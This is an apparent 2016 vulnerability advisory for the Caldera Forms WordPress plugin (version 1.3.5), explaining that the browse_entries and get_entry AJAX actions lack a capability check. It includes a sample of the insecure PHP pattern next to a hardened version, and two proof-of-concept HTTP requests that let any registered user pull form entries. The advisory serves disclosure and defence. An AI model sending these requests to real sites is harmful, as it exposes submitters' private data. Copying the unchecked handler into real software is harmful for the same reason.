Caldera Forms [Sensitive Data Exposure]
Description
The plugin Caldera Forms - Drag and drop responsive form builder registers the AJAX action browse_entries to give administrators a convenient way to see all records from a specific form. This action calls the browse_entries() function, which lacks a capability check before returning the requested information, so any registered user can call it to obtain sensitive information.

The same result can be achieved through the get_entry action, with the main difference that the attacker must supply entry IDs.

To exploit this an attacker needs a registered user account and the ID of the form. The latter can be acquired from various elements of the form's HTML markup, like the one displayed below:
<input name="_cf_frm_id" value="CF5719ec6205cb3" type="hidden">
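The root cause is an admin-ajax handler that trusts the wp_ajax_ hook alone: that prefix only guarantees a logged-in session, not a role. The following is an added illustration of that pattern and its fix, written for a hypothetical plugin (my_forms, table my_forms_entries, capability manage_options and nonce name are all assumptions); it is not Caldera Forms' own code.

```php
<?php
// Added example (hypothetical plugin "my_forms"), not Caldera Forms' code.
// The action name mirrors the advisory so the two handlers are easy to compare.

// 'Before': the vulnerable pattern described in the advisory.
// wp_ajax_* handlers run for ANY authenticated user, Subscriber included,
// so without an explicit capability check every registered user gets the data.
function my_forms_browse_entries_vulnerable() {
    global $wpdb;
    $form_id = sanitize_text_field( $_POST['form'] ?? '' );
    // No current_user_can() and no nonce: authorisation is simply absent.
    $rows = $wpdb->get_results( $wpdb->prepare(
        "SELECT id, datestamp, user_id FROM {$wpdb->prefix}my_forms_entries WHERE form_id = %s",
        $form_id
    ), ARRAY_A );
    wp_send_json_success( $rows );
}
// Shown for contrast only; the vulnerable handler is intentionally not hooked here.

// 'After': require a capability appropriate to the data, plus a nonce.
function my_forms_browse_entries_hardened() {
    global $wpdb;
    // 1. Authorisation: only users allowed to manage entries may list them.
    //    'manage_options' is an assumption; a real plugin would register its own capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }
    // 2. CSRF protection: the request must carry a nonce issued to this user
    //    (check_ajax_referer() dies with a 403 response if it is missing or invalid).
    check_ajax_referer( 'my_forms_browse_entries', 'nonce' );

    $form_id = sanitize_text_field( $_POST['form'] ?? '' );
    $rows = $wpdb->get_results( $wpdb->prepare(
        "SELECT id, datestamp, user_id FROM {$wpdb->prefix}my_forms_entries WHERE form_id = %s",
        $form_id
    ), ARRAY_A );
    wp_send_json_success( $rows );
}
add_action( 'wp_ajax_browse_entries', 'my_forms_browse_entries_hardened' );
```

A per-entry handler such as get_entry needs the same two checks; the capability test is the part that was missing, and a nonce alone would not have closed the hole because a logged-in attacker can obtain their own nonce.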
PoC
First a form must be created and some entries added to it. Next the attacker can use a request like:

POST /wp-admin/admin-ajax.php HTTP/1.1
Cookie: [COOKIES]
Content-Type: application/x-www-form-urlencoded

action=browse_entries&form=CF5719ec6205cb3

or, using the get_entry action:

POST /wp-admin/admin-ajax.php HTTP/1.1
Cookie: [COOKIES]
Content-Type: application/x-www-form-urlencoded

action=get_entry&form=CF5719ec6205cb3&entry=1
- Date: 22 April 2016
- Author: Pan Vag
- Vendor: calderawp.com
- Software: Caldera Forms
- Version: 1.3.5
- Platform: WordPress 4.5
- DWF ID: DWF-2016-87023